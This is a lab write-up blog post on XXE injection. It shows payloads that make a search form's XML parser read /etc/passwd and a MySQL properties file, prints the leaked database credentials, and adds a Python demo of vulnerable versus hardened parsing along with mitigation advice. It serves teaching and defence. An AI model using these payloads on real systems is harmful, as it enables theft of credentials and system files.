A daily description in the life of everything and nothing, and occasionally I talk about something useful or important.
aD
May 30, 2014
Practicing XXE
*** DISCLAIMER: ALL MY WORK HERE IS DONE AT WWW.HACKING-LAB.COM ***
XML external entity (XXE) injection vulnerabilities arise because the XML specification allows a document to define entities that reference resources external to the document. XML parsers typically support this feature by default, even though applications rarely need it. An external entity can reference a file on the parser's filesystem, so exploiting the feature may allow retrieval of arbitrary files the application process can read, or denial of service by making the server read from a special file such as /dev/random that blocks or never ends.
External entities can also reference URLs. Exploiting that may allow port scanning from the XML parser's host, or retrieval of sensitive web content that is otherwise unreachable because of network topology and defenses (the parser makes the request from inside the network, with whatever access the server has).
I performed this attack by intercepting the search form's request with OWASP ZAP. After submitting a test search, I looked at how the XML query was constructed in ZAP, then resent the request with modified parameters.
The first injection, used to check whether the parser resolved external entities at all, was the following:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY foo SYSTEM "file:///etc/passwd">
]>
<query>
<result-limit>1&foo;</result-limit>
<bell-name></bell-name>
<bell-description></bell-description>
</query>
Having confirmed that the application was vulnerable to this type of attack, I began trying other file locations, looking for the configuration files of the MySQL database. I started in the usual places (/etc/my.cnf, /root/.my.cnf and so forth) until I came across the properties file of the web application itself.
I then modified my injection to the following:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY foo SYSTEM "file:///opt/applic/tomcat/webapps.properties/mysql.properties">
]>
<query>
<result-limit>1&foo;</result-limit>
<bell-name></bell-name>
<bell-description></bell-description>
</query>
I pasted it back into ZAP, resent the request, and the response contained the following:
# MYSQL PROPERTIES - TIME IN SECONDS
################################################################
mysql.driver = org.gjt.mm.mysql.Driver
mysql.username = glockenemil
mysql.password = Nt88,.po
mysql.bells.url = jdbc:mysql://127.0.0.1:5506/glocken_emil?autoDeserialize=true
mysql.login.url = jdbc:mysql://127.0.0.1:5506/login
mysql.session.url = jdbc:mysql://127.0.0.1:5506/sessionservice
mysql.session.testquery =
mysql.login.testquery =
mysql.bells.testquery =
mysql.connections.max = 100
mysql.connections.min = 10
mysql.connections.increaserate = 2
mysql.connections.timeout = 120
mysql.connections.maxage = 900
# LOGIN TABLE DEFS
#################################################################
mysql.tblLogin = users
mysql.fldAdditionalTime = additionaltime
mysql.fldReleaseTime = releasetime
mysql.fldUsername = username
mysql.fldTries = tries
contactForm = no
XML external entity injection relies on the DOCTYPE declaration to define the injected entity. Most XML parsers can be configured to disable external entity resolution, or to reject documents that contain a DOCTYPE at all; consult the documentation for your XML parsing library to find the right setting. Input validation that rejects any input containing a DOCTYPE declaration is a useful second layer, but the parser configuration is the real fix, since a text filter can be bypassed by encoding tricks the parser still understands.
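To show both halves of the post (the payload above that inlines a file into result-limit, and the fix of turning off external entities or refusing DOCTYPE), here is an added example written for this page; it is not code from the lab or from the Tomcat application that was attacked. It uses Python's standard xml.sax parser instead of the lab's Java stack to reproduce the same mechanism, and every name in it (QueryHandler, RejectDoctype, parse_query, demo, the temp-directory mysql.properties with a made-up password) is an assumption of the example, not something from the original page.

```python
"""Added example (not from the original post): replay the post's XXE payload
against Python's xml.sax parser, first in the vulnerable configuration and
then hardened. The target file is a constructed stand-in for the lab's
mysql.properties, written to a temporary directory so the example is
self-contained.
"""
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax import handler

# Constructed sample file mimicking the layout of the leaked properties file.
SAMPLE_PROPERTIES = (
    "# MYSQL PROPERTIES - TIME IN SECONDS\n"
    "mysql.driver = org.gjt.mm.mysql.Driver\n"
    "mysql.username = glockenemil\n"
    "mysql.password = example-secret\n"
    "mysql.bells.url = jdbc:mysql://127.0.0.1:5506/glocken_emil\n"
)


def write_sample_file(directory):
    """Write the constructed properties file and return its file:// URL."""
    path = Path(directory) / "mysql.properties"
    path.write_text(SAMPLE_PROPERTIES)
    return path.as_uri()


def build_xxe_query(entity_url):
    """The post's payload: an external entity declared in the internal DTD
    subset and referenced from <result-limit>, so a resolving parser inlines
    the file's contents right there."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE foo [\n'
        f'<!ENTITY foo SYSTEM "{entity_url}">\n'
        ']>\n'
        '<query>\n'
        '<result-limit>1&foo;</result-limit>\n'
        '<bell-name></bell-name>\n'
        '<bell-description></bell-description>\n'
        '</query>\n'
    ).encode("utf-8")


class QueryHandler(handler.ContentHandler):
    """Collects the text content of each child element of <query>."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name != "query":
            self._current = name
            self.fields.setdefault(name, "")

    def characters(self, content):
        # Text from a resolved external entity arrives here as well; that is
        # how the file ends up inside <result-limit> in the server's reply.
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


class RejectDoctype:
    """Lexical handler whose only job is to refuse any DOCTYPE declaration.
    Doing this inside the parser (rather than grepping the bytes for
    '<!DOCTYPE') is not fooled by a differently encoded request body."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE declarations are not accepted")

    def endDTD(self): pass
    def startEntity(self, name): pass
    def endEntity(self, name): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, content): pass


def parse_query(xml_bytes, allow_external_entities=False, reject_doctype=True):
    """Parse a <query> document and return {element name: text}.

    allow_external_entities=True is the vulnerable configuration (and was the
    xml.sax default before Python 3.7.1); the defaults are the hardened one.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, allow_external_entities)
    if reject_doctype:
        parser.setProperty(handler.property_lexical_handler, RejectDoctype())
    content = QueryHandler()
    parser.setContentHandler(content)
    parser.parse(io.BytesIO(xml_bytes))
    return content.fields


def demo():
    """Run the payload through the vulnerable and the hardened parser.
    Returns (leaked fields, fields with entities disabled, doctype rejected?)."""
    with tempfile.TemporaryDirectory() as tmp:
        payload = build_xxe_query(write_sample_file(tmp))
        leaked = parse_query(payload, allow_external_entities=True, reject_doctype=False)
        safe = parse_query(payload, reject_doctype=False)
        try:
            parse_query(payload)
            rejected = False
        except ValueError:
            rejected = True
    return leaked, safe, rejected


if __name__ == "__main__":
    leaked, safe, rejected = demo()
    print("vulnerable parser put this in result-limit:\n" + leaked["result-limit"])
    print("entities disabled, result-limit is:", repr(safe["result-limit"]))
    print("DOCTYPE rejected by hardened parser:", rejected)
```

With external entities enabled, result-limit comes back as the literal "1" followed by the whole properties file, which is exactly what the ZAP response above shows; with the feature off the entity expands to nothing, and with the DOCTYPE check in place the request never reaches the point of declaring an entity.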